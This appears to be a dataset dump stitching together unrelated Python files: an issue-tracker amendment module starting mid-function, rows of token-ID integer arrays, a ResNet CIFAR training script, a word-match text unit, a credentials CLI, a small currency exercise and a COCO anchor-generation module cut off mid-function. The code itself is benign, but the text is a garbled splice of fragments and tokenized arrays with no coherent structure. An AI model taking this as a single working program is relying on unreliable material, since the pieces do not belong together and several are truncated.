delta.blocking_add, delta.blocking_remove, issue_service)
amendments.extend(block_changes_amendments)
impacted_iids.update(block_changes_impacted_iids)
# Update external issue references.
if delta.ext_blocked_on_add or delta.ext_blocked_on_remove:
add_refs = []
for ext_id in delta.ext_blocked_on_add:
ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
if (federated.IsShortlinkValid(ext_id) and
ref not in issue.dangling_blocked_on_refs and
ext_id not in delta.ext_blocked_on_remove):
add_refs.append(ref)
remove_refs = []
for ext_id in delta.ext_blocked_on_remove:
ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
if (federated.IsShortlinkValid(ext_id) and
ref in issue.dangling_blocked_on_refs):
remove_refs.append(ref)
if add_refs or remove_refs:
amendments.append(MakeBlockedOnAmendment(add_refs, remove_refs))
issue.dangling_blocked_on_refs = [
ref for ref in issue.dangling_blocked_on_refs + add_refs
if ref.ext_issue_identifier not in delta.ext_blocked_on_remove]
# Update external issue references.
if delta.ext_blocking_add or delta.ext_blocking_remove:
add_refs = []
for ext_id in delta.ext_blocking_add:
ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
if (federated.IsShortlinkValid(ext_id) and
ref not in issue.dangling_blocking_refs and
ext_id not in delta.ext_blocking_remove):
add_refs.append(ref)
remove_refs = []
for ext_id in delta.ext_blocking_remove:
ref = tracker_pb2.DanglingIssueRef(ext_issue_identifier=ext_id)
if (federated.IsShortlinkValid(ext_id) and
ref in issue.dangling_blocking_refs):
remove_refs.append(ref)
if add_refs or remove_refs:
amendments.append(MakeBlockingAmendment(add_refs, remove_refs))
issue.dangling_blocking_refs = [
ref for ref in issue.dangling_blocking_refs + add_refs
if ref.ext_issue_identifier not in delta.ext_blocking_remove]
if delta.merged_into is not None and delta.merged_into_external is not None:
raise ValueError(('Cannot update merged_into and merged_into_external'
' fields at the same time.'))
if (delta.merged_into is not None and
delta.merged_into != issue.merged_into and
((delta.merged_into == 0 and issue.merged_into is not None) or
delta.merged_into != 0)):
# Handle removing the existing internal merged_into.
try:
merged_remove = issue.merged_into
remove_issue = issue_service.GetIssue(cnxn, merged_remove)
remove_ref = remove_issue.project_name, remove_issue.local_id
impacted_iids.add(merged_remove)
except exceptions.NoSuchIssueException:
remove_ref = None
# Handle going from external->internal mergedinto.
if issue.merged_into_external:
remove_ref = tracker_pb2.DanglingIssueRef(
ext_issue_identifier=issue.merged_into_external)
issue.merged_into_external = None
# Handle adding the new merged_into.
try:
merged_add = delta.merged_into
issue.merged_into = delta.merged_into
add_issue = issue_service.GetIssue(cnxn, merged_add)
add_ref = add_issue.project_name, add_issue.local_id
impacted_iids.add(merged_add)
except exceptions.NoSuchIssueException:
add_ref = None
amendments.append(MakeMergedIntoAmendment(
[add_ref], [remove_ref], default_project_name=issue.project_name))
if (delta.merged_into_external is not None and
delta.merged_into_external != issue.merged_into_external and
(federated.IsShortlinkValid(delta.merged_into_external) or
(delta.merged_into_external == '' and issue.merged_into_external))):
remove_ref = None
if issue.merged_into_external:
remove_ref = tracker_pb2.DanglingIssueRef(
ext_issue_identifier=issue.merged_into_external)
elif issue.merged_into:
# Handle moving from internal->external mergedinto.
try:
remove_issue = issue_service.GetIssue(cnxn, issue.merged_into)
remove_ref = remove_issue.project_name, remove_issue.local_id
impacted_iids.add(issue.merged_into)
except exceptions.NoSuchIssueException:
pass
add_ref = tracker_pb2.DanglingIssueRef(
ext_issue_identifier=delta.merged_into_external)
issue.merged_into = 0
issue.merged_into_external = delta.merged_into_external
amendments.append(MakeMergedIntoAmendment([add_ref], [remove_ref],
default_project_name=issue.project_name))
if delta.summary and delta.summary != issue.summary:
amendments.append(MakeSummaryAmendment(delta.summary, issue.summary))
issue.summary = delta.summary
return amendments, impacted_iids
def ApplyIssueBlockRelationChanges(
cnxn, issue, blocked_on_add, blocked_on_remove, blocking_add,
blocking_remove, issue_service):
# type: (MonorailConnection, Issue, Collection[int], Collection[int],
# Collection[int], Collection[int], IssueService) ->
# Sequence[Amendment], Collection[int]
"""Apply issue blocking/blocked_on relation changes to an issue in RAM.
Args:
cnxn: connection to SQL database.
issue: Issue PB that we are applying the changes to.
blocked_on_add: list of issue IDs that we want to add as blocked_on.
blocked_on_remove: list of issue IDs that we want to remove from blocked_on.
blocking_add: list of issue IDs that we want to add as blocking.
blocking_remove: list of issue IDs that we want to remove from blocking.
issue_service: IssueService used to fetch info from DB or cache.
Returns:
A tuple that holds the list of Amendments that represent the applied changes
and a set of issue IDs that are impacted by the changes.
Side-effect:
The given issue's blocked_on and blocking fields will be modified.
"""
amendments = []
impacted_iids = set()
# Apply blocked_on changes.
old_blocked_on = issue.blocked_on_iids
blocked_on_add = [iid for iid in blocked_on_add if iid not in old_blocked_on]
blocked_on_remove = [
iid for iid in blocked_on_remove if iid in old_blocked_on
]
# blocked_on_add and blocked_on_remove are filtered above such that they
# could not contain matching items.
if blocked_on_add or blocked_on_remove:
addAmendment(blocked_on_add, blocked_on_remove, MakeBlockedOnAmendment)
new_blocked_on_iids = [
iid for iid in old_blocked_on + blocked_on_add
if iid not in blocked_on_remove
]
(issue.blocked_on_iids,
issue.blocked_on_ranks) = issue_service.SortBlockedOn(
cnxn, issue, new_blocked_on_iids)
impacted_iids.update(blocked_on_add + blocked_on_remove)
# Apply blocking changes.
old_blocking = issue.blocking_iids
blocking_add = [iid for iid in blocking_add if iid not in old_blocking]
blocking_remove = [iid for iid in blocking_remove if iid in old_blocking]
# blocking_add and blocking_remove are filtered above such that they
# could not contain matching items.
if blocking_add or blocking_remove:
addAmendment(blocking_add, blocking_remove, MakeBlockingAmendment)
issue.blocking_iids = [
iid for iid in old_blocking + blocking_add if iid not in blocking_remove
]
impacted_iids.update(blocking_add + blocking_remove)
return amendments, impacted_iids
def MakeAmendment(
field, new_value, added_ids, removed_ids, custom_field_name=None,
old_value=None):
"""Utility function to populate an Amendment PB.
Args:
field: enum for the field being updated.
new_value: new string value of that field.
added_ids: list of user IDs being added.
removed_ids: list of user IDs being removed.
custom_field_name: optional name of a custom field.
old_value: old string value of that field.
Returns:
An instance of Amendment.
"""
amendment = tracker_pb2.Amendment()
amendment.field = field
amendment.newvalue = new_value
amendment.added_user_ids.extend(added_ids)
amendment.removed_user_ids.extend(removed_ids)
if old_value is not None:
amendment.oldvalue = old_value
if custom_field_name is not None:
amendment.custom_field_name = custom_field_name
return amendment
def _PlusMinusString(added_items, removed_items):
"""Return a concatenation of the items, with a minus on removed items.
Args:
added_items: list of string items added.
removed_items: list of string items removed.
Returns:
A unicode string with all the removed items first (preceeded by minus
signs) and then the added items.
"""
assert all(isinstance(item, string_types)
for item in added_items + removed_items)
# TODO(jrobbins): this is not good when values can be negative ints.
return ' '.join(
['-%s' % item.strip()
for item in removed_items if item] +
['%s' % item for item in added_items if item])
def _PlusMinusAmendment(
field, added_items, removed_items, custom_field_name=None):
"""Make an Amendment PB with the given added/removed items."""
return MakeAmendment(
field, _PlusMinusString(added_items, removed_items), [], [],
custom_field_name=custom_field_name)
def _PlusMinusRefsAmendment(
field, added_refs, removed_refs, default_project_name=None):
"""Make an Amendment PB with the given added/removed refs."""
return _PlusMinusAmendment(
field,
[FormatIssueRef(r, default_project_name=default_project_name)
for r in added_refs if r],
[FormatIssueRef(r, default_project_name=default_project_name)
for r in removed_refs if r])
def MakeSummaryAmendment(new_summary, old_summary):
"""Make an Amendment PB for a change to the summary."""
return MakeAmendment(
tracker_pb2.FieldID.SUMMARY, new_summary, [], [], old_value=old_summary)
def MakeStatusAmendment(new_status, old_status):
"""Make an Amendment PB for a change to the status."""
return MakeAmendment(
tracker_pb2.FieldID.STATUS, new_status, [], [], old_value=old_status)
def MakeOwnerAmendment(new_owner_id, old_owner_id):
"""Make an Amendment PB for a change to the owner."""
return MakeAmendment(
tracker_pb2.FieldID.OWNER, '', [new_owner_id], [old_owner_id])
def MakeCcAmendment(added_cc_ids, removed_cc_ids):
"""Make an Amendment PB for a change to the Cc list."""
return MakeAmendment(
tracker_pb2.FieldID.CC, '', added_cc_ids, removed_cc_ids)
def MakeLabelsAmendment(added_labels, removed_labels):
"""Make an Amendment PB for a change to the labels."""
return _PlusMinusAmendment(
tracker_pb2.FieldID.LABELS, added_labels, removed_labels)
def DiffValueLists(new_list, old_list):
"""Give an old list and a new list, return the added and removed items."""
if not old_list:
return new_list, []
if not new_list:
return [], old_list
added = []
removed = old_list[:] # Assume everything was removed, then narrow that down
for val in new_list:
if val in removed:
removed.remove(val)
else:
added.append(val)
return added, removed
def MakeFieldAmendment(
field_id, config, new_values, old_values=None, phase_name=None):
"""Return an amendment showing how an issue's field changed.
Args:
field_id: int field ID of a built-in or custom issue field.
config: config info for the current project, including field_defs.
new_values: list of strings representing new values of field.
old_values: list of strings representing old values of field.
phase_name: name of the phase that owned the field that was changed.
Returns:
A new Amemdnent object.
Raises:
ValueError: if the specified field was not found.
"""
fd = FindFieldDefByID(field_id, config)
if fd is None:
raise ValueError('field %r vanished mid-request', field_id)
field_name = fd.field_name if not phase_name else '%s-%s' % (
phase_name, fd.field_name)
if fd.is_multivalued:
old_values = old_values or []
added, removed = DiffValueLists(new_values, old_values)
if fd.field_type == tracker_pb2.FieldTypes.USER_TYPE:
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, '', added, removed,
custom_field_name=field_name)
else:
return _PlusMinusAmendment(
tracker_pb2.FieldID.CUSTOM,
['%s' % item for item in added],
['%s' % item for item in removed],
custom_field_name=field_name)
else:
if fd.field_type == tracker_pb2.FieldTypes.USER_TYPE:
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, '', new_values, [],
custom_field_name=field_name)
if new_values:
new_str = ', '.join('%s' % item for item in new_values)
else:
new_str = '----'
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, new_str, [], [],
custom_field_name=field_name)
def MakeApprovalStructureAmendment(new_approvals, old_approvals):
"""Return an Amendment showing an issue's approval structure changed.
Args:
new_approvals: the new list of approvals.
old_approvals: the old list of approvals.
Returns:
A new Amendment object.
"""
approvals_added, approvals_removed = DiffValueLists(
new_approvals, old_approvals)
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, _PlusMinusString(
approvals_added, approvals_removed),
[], [], custom_field_name='Approvals')
def MakeApprovalStatusAmendment(new_status):
"""Return an Amendment showing an issue approval's status changed.
Args:
new_status: ApprovalStatus representing the new approval status.
Returns:
A new Amemdnent object.
"""
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, new_status.name.lower(), [], [],
custom_field_name='Status')
def MakeApprovalApproversAmendment(approvers_add, approvers_remove):
"""Return an Amendment showing an issue approval's approvers changed.
Args:
approvers_add: list of approver user_ids being added.
approvers_remove: list of approver user_ids being removed.
Returns:
A new Amendment object.
"""
return MakeAmendment(
tracker_pb2.FieldID.CUSTOM, '', approvers_add, approvers_remove,
custom_field_name='Approvers')
def MakeComponentsAmendment(added_comp_ids, removed_comp_ids, config):
"""Make an Amendment PB for a change to the components."""
# TODO(jrobbins): record component IDs as ints and display them with
# lookups (and maybe permission checks in the future). But, what
# about history that references deleleted components?
added_comp_paths = []
for comp_id in added_comp_ids:
cd = FindComponentDefByID(comp_id, config)
if cd:
added_comp_paths.append(cd.path)
removed_comp_paths = []
for comp_id in removed_comp_ids:
cd = FindComponentDefByID(comp_id, config)
if cd:
removed_comp_paths.append(cd.path)
return _PlusMinusAmendment(
tracker_pb2.FieldID.COMPONENTS,
added_comp_paths, removed_comp_paths)
def MakeBlockedOnAmendment(
added_refs, removed_refs, default_project_name=None):
"""Make an Amendment PB for a change to the blocked on issues."""
return _PlusMinusRefsAmendment(
tracker_pb2.FieldID.BLOCKEDON, added_refs, removed_refs,
default_project_name=default_project_name)
def MakeBlockingAmendment(added_refs, removed_refs, default_project_name=None):
"""Make an Amendment PB for a change to the blocking issues."""
return _PlusMinusRefsAmendment(
tracker_pb2.FieldID.BLOCKING, added_refs, removed_refs,
default_project_name=default_project_name)
def MakeMergedIntoAmendment(
added_refs, removed_refs, default_project_name=None):
"""Make an Amendment PB for a change to the merged-into issue."""
return _PlusMinusRefsAmendment(
tracker_pb2.FieldID.MERGEDINTO, added_refs, removed_refs,
default_project_name=default_project_name)
def MakeProjectAmendment(new_project_name):
"""Make an Amendment PB for a change to an issue's project."""
return MakeAmendment(
tracker_pb2.FieldID.PROJECT, new_project_name, [], [])
def AmendmentString_New(amendment, user_display_names):
# type: (tracker_pb2.Amendment, Mapping[int, str]) -> str
"""Produce a displayable string for an Amendment PB.
Args:
amendment: Amendment PB to display.
user_display_names: dict {user_id: display_name, ...} including all users
mentioned in amendment.
Returns:
A string that could be displayed on a web page or sent in email.
"""
if amendment.newvalue:
return amendment.newvalue
# Display new owner only
if amendment.field == tracker_pb2.FieldID.OWNER:
if amendment.added_user_ids and amendment.added_user_ids[0]:
uid = amendment.added_user_ids[0]
result = user_display_names[uid]
else:
result = framework_constants.NO_USER_NAME
else:
added = [
user_display_names[uid]
for uid in amendment.added_user_ids
if uid in user_display_names
]
removed = [
user_display_names[uid]
for uid in amendment.removed_user_ids
if uid in user_display_names
]
result = _PlusMinusString(added, removed)
return result
def AmendmentString(amendment, user_views_by_id):
"""Produce a displayable string for an Amendment PB.
TODO(crbug.com/monorail/7571): Delete this function in favor of _New.
Args:
amendment: Amendment PB to display.
user_views_by_id: dict {user_id: user_view, ...} including all users
mentioned in amendment.
Returns:
A string that could be displayed on a web page or sent in email.
"""
if amendment.newvalue:
return amendment.newvalue
# Display new owner only
if amendment.field == tracker_pb2.FieldID.OWNER:
if amendment.added_user_ids and amendment.added_user_ids[0]:
uid = amendment.added_user_ids[0]
result = user_views_by_id[uid].display_name
else:
result = framework_constants.NO_USER_NAME
else:
result = _PlusMinusString(
[user_views_by_id[uid].display_name for uid in amendment.added_user_ids
if uid in user_views_by_id],
[user_views_by_id[uid].display_name
for uid in amendment.removed_user_ids if uid in user_views_by_id])
return result
def AmendmentLinks(amendment, users_by_id, project_name):
"""Produce a list of value/url pairs for an Amendment PB.
Args:
amendment: Amendment PB to display.
users_by_id: dict {user_id: user_view, ...} including all users
mentioned in amendment.
project_nme: Name of project the issue/comment/amendment is in.
Returns:
A list of dicts with 'value' and 'url' keys. 'url' may be None.
"""
# Display both old and new summary, status
if (amendment.field == tracker_pb2.FieldID.SUMMARY or
amendment.field == tracker_pb2.FieldID.STATUS):
result = amendment.newvalue
oldValue = amendment.oldvalue;
# Old issues have a 'NULL' string as the old value of the summary
# or status fields. See crbug.com/monorail/3805
if oldValue and oldValue != 'NULL':
result += ' (was: %s)' % amendment.oldvalue
return [{'value': result, 'url': None}]
# Display new owner only
elif amendment.field == tracker_pb2.FieldID.OWNER:
if amendment.added_user_ids and amendment.added_user_ids[0]:
uid = amendment.added_user_ids[0]
return [{'value': users_by_id[uid].display_name, 'url': None}]
return [{'value': framework_constants.NO_USER_NAME, 'url': None}]
elif amendment.field in (tracker_pb2.FieldID.BLOCKEDON,
tracker_pb2.FieldID.BLOCKING,
tracker_pb2.FieldID.MERGEDINTO):
values = amendment.newvalue.split()
bug_refs = [_SafeParseIssueRef(v.strip()) for v in values]
issue_urls = [FormatIssueURL(ref, default_project_name=project_name)
for ref in bug_refs]
# TODO(jrobbins): Permission checks on referenced issues to allow
# showing summary on hover.
return [{'value': v, 'url': u} for (v, u) in zip(values, issue_urls)]
elif amendment.newvalue:
# Catchall for everything except user-valued fields.
return [{'value': v, 'url': None} for v in amendment.newvalue.split()]
else:
# Applies to field==CC or CUSTOM with user type.
values = _PlusMinusString(
[users_by_id[uid].display_name for uid in amendment.added_user_ids
if uid in users_by_id],
[users_by_id[uid].display_name for uid in amendment.removed_user_ids
if uid in users_by_id])
return [{'value': v.strip(), 'url': None} for v in values.split()]
def GetAmendmentFieldName(amendment):
"""Get user-visible name for an amendment to a built-in or custom field."""
if amendment.custom_field_name:
return amendment.custom_field_name
else:
field_name = str(amendment.field)
return field_name.capitalize()
def MakeDanglingIssueRef(project_name, issue_id, ext_id=''):
"""Create a DanglingIssueRef pb."""
ret = tracker_pb2.DanglingIssueRef()
ret.project = project_name
ret.issue_id = issue_id
ret.ext_issue_identifier = ext_id
return ret
def FormatIssueURL(issue_ref_tuple, default_project_name=None):
"""Format an issue url from an issue ref."""
if issue_ref_tuple is None:
return ''
project_name, local_id = issue_ref_tuple
project_name = project_name or default_project_name
url = framework_helpers.FormatURL(
None, '/p/%s%s' % (project_name, urls.ISSUE_DETAIL), id=local_id)
return url
def FormatIssueRef(issue_ref_tuple, default_project_name=None):
"""Format an issue reference for users: e.g., 123, or projectname:123."""
if issue_ref_tuple is None:
return ''
# TODO(jeffcarp): Improve method signature to not require isinstance.
if isinstance(issue_ref_tuple, tracker_pb2.DanglingIssueRef):
return issue_ref_tuple.ext_issue_identifier or ''
project_name, local_id = issue_ref_tuple
if project_name and project_name != default_project_name:
return '%s:%d' % (project_name, local_id)
else:
return str(local_id)
def ParseIssueRef(ref_str):
"""Parse an issue ref string: e.g., 123, or projectname:123 into a tuple.
Raises ValueError if the ref string exists but can't be parsed.
"""
if not ref_str.strip():
return None
if ':' in ref_str:
project_name, id_str = ref_str.split(':', 1)
project_name = project_name.strip().lstrip('-')
else:
project_name = None
id_str = ref_str
id_str = id_str.lstrip('-')
return project_name, int(id_str)
def _SafeParseIssueRef(ref_str):
"""Same as ParseIssueRef, but catches ValueError and returns None instead."""
try:
return ParseIssueRef(ref_str)
except ValueError:
return None
def _MergeFields(field_values, fields_add, fields_remove, field_defs):
"""Merge the fields to add/remove into the current field values.
Args:
field_values: list of current FieldValue PBs.
fields_add: list of FieldValue PBs to add to field_values. If any of these
is for a single-valued field, it replaces all previous values for the
same field_id in field_values.
fields_remove: list of FieldValues to remove from field_values, if found.
field_defs: list of FieldDef PBs from the issue's project's config.
Returns:
A 3-tuple with the merged list of field values and {field_id: field_values}
dict for the specific values that are added or removed. The actual added
or removed might be fewer than the requested ones if the issue already had
one of the values-to-add or lacked one of the values-to-remove.
"""
is_multi = {fd.field_id: fd.is_multivalued for fd in field_defs}
merged_fvs = list(field_values)
added_fvs_by_id = collections.defaultdict(list)
for fv_consider in fields_add:
consider_value = GetFieldValue(fv_consider, {})
for old_fv in field_values:
# Don't add fv_consider if field_values already contains consider_value
if (fv_consider.field_id == old_fv.field_id and
GetFieldValue(old_fv, {}) == consider_value and
fv_consider.phase_id == old_fv.phase_id):
break
else:
# Drop any existing values for non-multi fields.
if not is_multi.get(fv_consider.field_id):
if fv_consider.phase_id:
# Drop existing phase fvs that belong to the same phase
merged_fvs = [fv for fv in merged_fvs if
not (fv.field_id == fv_consider.field_id
and fv.phase_id == fv_consider.phase_id)]
else:
# Drop existing non-phase fvs
merged_fvs = [fv for fv in merged_fvs if
not fv.field_id == fv_consider.field_id]
added_fvs_by_id[fv_consider.field_id].append(fv_consider)
merged_fvs.append(fv_consider)
removed_fvs_by_id = collections.defaultdict(list)
for fv_consider in fields_remove:
consider_value = GetFieldValue(fv_consider, {})
for old_fv in field_values:
# Only remove fv_consider if field_values contains consider_value
if (fv_consider.field_id == old_fv.field_id and
GetFieldValue(old_fv, {}) == consider_value and
fv_consider.phase_id == old_fv.phase_id):
removed_fvs_by_id[fv_consider.field_id].append(fv_consider)
merged_fvs.remove(old_fv)
return merged_fvs, added_fvs_by_id, removed_fvs_by_id
def SplitBlockedOnRanks(issue, target_iid, split_above, open_iids):
"""Splits issue relation rankings by some target issue's rank
Args:
issue: Issue PB for the issue considered.
target_iid: the global ID of the issue to split rankings about.
split_above: False to split below the target issue, True to split above.
open_iids: a list of global IDs of open and visible issues blocking
the considered issue.
Returns:
A tuple (lower, higher) where both are lists of
[(blocker_iid, rank),...] of issues in rank order. If split_above is False
the target issue is included in higher, otherwise it is included in lower
"""
issue_rank_pairs = [(dst_iid, rank)
for (dst_iid, rank) in zip(issue.blocked_on_iids, issue.blocked_on_ranks)
if dst_iid in open_iids]
# blocked_on_iids is sorted high-to-low, we need low-to-high
issue_rank_pairs.reverse()
offset = int(split_above)
for i, (dst_iid, _) in enumerate(issue_rank_pairs):
if dst_iid == target_iid:
return issue_rank_pairs[:i + offset], issue_rank_pairs[i + offset:]
logging.error('Target issue %r was not found in blocked_on_iids of %r',
target_iid, issue)
return issue_rank_pairs, []
| [
2,
15069,
1584,
383,
18255,
1505,
46665,
13,
1439,
2489,
10395,
13,
198,
2,
5765,
286,
428,
2723,
2438,
318,
21825,
416,
257,
347,
10305,
12,
7635,
198,
2,
5964,
326,
460,
307,
1043,
287,
262,
38559,
24290,
2393,
393,
379,
198,
2,
... | 2.748121 | 23,015 |
"""
Copyright 2017 JetBrains, s.r.o
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
from fasttrain import train_on_cifar
from fasttrain.model.resnet import ResNetCIFAR
from fasttrain.schedules import resnet_paper_schedule, TOTAL_EPOCHS
parser = argparse.ArgumentParser(description='Train ResNet on CIFAR10')
parser.add_argument('-n', '--number', type=int, default=20)
parser.add_argument('-b', '--batch-size', type=int, default=128)
parser.add_argument('-lr', '--learn_rate', type=float, default=0.1)
parser.add_argument('-sd', '--stochastic-depth', type=str, default=None)
parser.add_argument('-st', '--show-test', type=bool, default=False)
parser.add_argument('-pa', '--pre-activated', type=bool, default=False)
parser.add_argument('-hp', '--half-precision', type=bool, default=False)
parser.add_argument('-yf', '--yellowfin', type=bool, default=False)
parser.add_argument('-e', '--epochs', type=int, default=TOTAL_EPOCHS)
parser.add_argument('-ls', '--loss-scale', type=float, default=1) # 1024 for half-precision
args = parser.parse_args()
stochastic_depth = None
if args.stochastic_depth:
sd = args.stochastic_depth
if sd == 'true':
stochastic_depth = {}
else:
splitted = sd.split('-')
stochastic_depth = {
'from': float(splitted[0]),
'to': float(splitted[1])
}
batch_size = args.batch_size
n = args.number
pre_activated = args.pre_activated
base_lr=args.learn_rate
show_test = args.show_test
epochs = args.epochs
loss_scale = args.loss_scale
schedule = resnet_paper_schedule(batch_size=batch_size, yellow_fin=args.yellowfin, scale=epochs/TOTAL_EPOCHS)
net = ResNetCIFAR(n, pre_activated=pre_activated, stochastic_depth=stochastic_depth)
name=f'ResNet({n}, lr={base_lr}, epochs={epochs}, pa={pre_activated}, sd={args.stochastic_depth}, hp={args.half_precision}, yf={args.yellowfin}), ls={args.loss_scale}'
train_on_cifar(net, schedule, batch_size=batch_size, name=name, show_test=show_test)
| [
37811,
198,
220,
220,
15069,
2177,
19013,
9414,
1299,
11,
264,
13,
81,
13,
78,
628,
220,
220,
49962,
739,
262,
24843,
13789,
11,
10628,
362,
13,
15,
357,
1169,
366,
34156,
15341,
198,
220,
220,
345,
743,
407,
779,
428,
2393,
2845,
... | 2.78 | 900 |
import numpy as np
from .unit import Unit
class WordExactMatch(Unit):
"""
WordExactUnit Class.
Process unit to get a binary match list of two word index lists. The
word index list is the word representation of a text.
Examples:
>>> import pandas
>>> input_ = pandas.DataFrame({
... 'text_left':[[1, 2, 3],[4, 5, 7, 9]],
... 'text_right':[[5, 3, 2, 7],[2, 3, 5]]}
... )
>>> left_word_exact_match = WordExactMatch(
... match='text_left', to_match='text_right'
... )
>>> left_out = input_.apply(left_word_exact_match.transform, axis=1)
>>> left_out[0]
[0, 1, 1]
>>> left_out[1]
[0, 1, 0, 0]
>>> right_word_exact_match = WordExactMatch(
... match='text_right', to_match='text_left'
... )
>>> right_out = input_.apply(right_word_exact_match.transform, axis=1)
>>> right_out[0]
[0, 1, 1, 0]
>>> right_out[1]
[0, 0, 1]
"""
def __init__(
self,
match: str,
to_match: str
):
"""
Class initialization.
:param match: the 'match' column name.
:param to_match: the 'to_match' column name.
"""
self._match = match
self._to_match = to_match
def transform(self, input_) -> list:
"""
Transform two word index lists into a binary match list.
:param input_: a dataframe include 'match' column and
'to_match' column.
:return: a binary match result list of two word index lists.
"""
match_binary = []
for i in range(len(input_[self._match])):
if input_[self._match][i] in set(input_[self._to_match]):
match_binary.append(1)
else:
match_binary.append(0)
return match_binary
| [
11748,
299,
32152,
355,
45941,
198,
198,
6738,
764,
20850,
1330,
11801,
628,
198,
4871,
9678,
3109,
529,
23850,
7,
26453,
2599,
198,
220,
220,
220,
37227,
198,
220,
220,
220,
9678,
3109,
529,
26453,
5016,
13,
628,
220,
220,
220,
10854... | 2.091916 | 903 |
import pickle
from pathlib import Path
import click
from click import ClickException
from omigami.authentication import encrypt_credentials
from omigami.omi_settings import get_credentials_path, get_credentials_folder_path
@click.command()
@click.option("--username", help="Your Omigami.com username")
@click.option("--password", help="Your Omigami.com password")
@click.option(
"--unset",
is_flag=True,
help="Remove previously setup credentials for the current user",
)
def credentials_helper(username, password, unset):
"""
CLI Helper for configuring the user machine to access the Omigami endpoints
"""
path = get_credentials_path()
Path(get_credentials_folder_path()).mkdir(parents=True, exist_ok=True)
if unset:
open(path, "w").close()
print("Crendetials successfully unset.")
return
if not username or not password:
raise ClickException(
"Please provide username and password using --username and --password arguments, "
"placing values between single quotes is recommended"
)
creds = encrypt_credentials(username, password)
with open(path, "wb") as file_handle:
pickle.dump(creds, file_handle, protocol=pickle.HIGHEST_PROTOCOL)
print("Crendetials successfully saved.")
@click.group()
omigami.add_command(credentials_helper)
| [
11748,
2298,
293,
198,
6738,
3108,
8019,
1330,
10644,
198,
198,
11748,
3904,
198,
6738,
3904,
1330,
6914,
16922,
198,
198,
6738,
39030,
328,
6277,
13,
41299,
3299,
1330,
34117,
62,
66,
445,
14817,
198,
6738,
39030,
328,
6277,
13,
12753,... | 2.867925 | 477 |
import moeda
moeda.limpar()
v = float(input('Digite um valor: R$ '))
print(f'Aumentando 10% temos: {moeda.aumentar(v, 10, True)}')
print(f'Diminuindo 20% temos: {moeda.diminuir(v, 20, True)}')
print(f'O dobro é {moeda.dobro(v, True)}')
print(f'A metade é {moeda.metade(v, True)}')
| [
11748,
6941,
18082,
198,
5908,
18082,
13,
2475,
1845,
3419,
198,
198,
85,
796,
12178,
7,
15414,
10786,
19511,
578,
23781,
1188,
273,
25,
371,
3,
705,
4008,
198,
198,
4798,
7,
69,
6,
32,
1713,
25440,
838,
4,
2169,
418,
25,
1391,
59... | 2.143939 | 132 |
import tensorflow as tf
import tensorflow_datasets as tfds
from tensorflow import keras
from keras_cv_attention_models.imagenet.data import init_mean_std_by_rescale_mode, random_crop_fraction
COCO_LABELS = """person, bicycle, car, motorcycle, airplane, bus, train, truck, boat, traffic light, fire hydrant, stop sign,
parking meter, bench, bird, cat, dog, horse, sheep, cow, elephant, bear, zebra, giraffe, backpack, umbrella, handbag, tie,
suitcase, frisbee, skis, snowboard, sports ball, kite, baseball bat, baseball glove, skateboard, surfboard, tennis racket,
bottle, wine glass, cup, fork, knife, spoon, bowl, banana, apple, sandwich, orange, broccoli, carrot, hot dog, pizza, donut,
cake, chair, couch, potted plant, bed, dining table, toilet, tv, laptop, mouse, remote, keyboard, cell phone, microwave, oven,
toaster, sink, refrigerator, book, clock, vase, scissors, teddy bear, hair drier, toothbrush"""
COCO_80_LABEL_DICT = {id: ii.strip() for id, ii in enumerate(COCO_LABELS.split(","))}
INVALID_ID_90 = [12, 26, 29, 30, 45, 66, 68, 69, 71, 83]
COCO_90_LABEL_DICT = {id: ii for id, ii in zip(set(range(90)) - set(INVALID_ID_90), COCO_80_LABEL_DICT.values())}
COCO_90_LABEL_DICT.update({ii: "Unknown" for ii in INVALID_ID_90})
COCO_80_to_90_LABEL_DICT = {id_80: id_90 for id_80, id_90 in enumerate(set(range(90)) - set(INVALID_ID_90))}
def get_anchors(input_shape=(512, 512, 3), pyramid_levels=[3, 7], aspect_ratios=[1, 2, 0.5], num_scales=3, anchor_scale=4, grid_zero_start=False):
"""
>>> from keras_cv_attention_models.coco import data
>>> input_shape = [512, 128]
>>> anchors = data.get_anchors([512, 128], pyramid_levels=[7])
>>> data.draw_bboxes(anchors * [512, 128, 512, 128])
grid_zero_start: grid starts from 0, else from strides // 2. False for efficientdet anchors, True for yolo anchors.
"""
# base anchors
scales = [2 ** (ii / num_scales) * anchor_scale for ii in range(num_scales)]
aspect_ratios = tf.convert_to_tensor(aspect_ratios, dtype="float32")
if len(aspect_ratios.shape) == 1:
# aspect_ratios = [0.5, 1, 2]
sqrt_ratios = tf.sqrt(aspect_ratios)
ww_ratios, hh_ratios = sqrt_ratios, 1 / sqrt_ratios
else:
# aspect_ratios = [(1, 1), (1.4, 0.7), (0.7, 1.4)]
ww_ratios, hh_ratios = aspect_ratios[:, 0], aspect_ratios[:, 1]
base_anchors_hh = tf.reshape(tf.expand_dims(scales, 1) * tf.expand_dims(hh_ratios, 0), [-1])
base_anchors_ww = tf.reshape(tf.expand_dims(scales, 1) * tf.expand_dims(ww_ratios, 0), [-1])
base_anchors_hh_half, base_anchors_ww_half = base_anchors_hh / 2, base_anchors_ww / 2
base_anchors = tf.stack([base_anchors_hh_half * -1, base_anchors_ww_half * -1, base_anchors_hh_half, base_anchors_ww_half], axis=1)
# base_anchors = tf.gather(base_anchors, [3, 6, 0, 4, 7, 1, 5, 8, 2]) # re-order according to official generated anchors
# make grid
pyramid_levels = list(range(min(pyramid_levels), max(pyramid_levels) + 1))
# https://github.com/google/automl/tree/master/efficientdet/utils.py#L509
feature_sizes = [input_shape[:2]]
for _ in range(max(pyramid_levels)):
pre_feat_size = feature_sizes[-1]
feature_sizes.append(((pre_feat_size[0] - 1) // 2 + 1, (pre_feat_size[1] - 1) // 2 + 1)) # ceil mode, like padding="SAME" downsampling
all_anchors = []
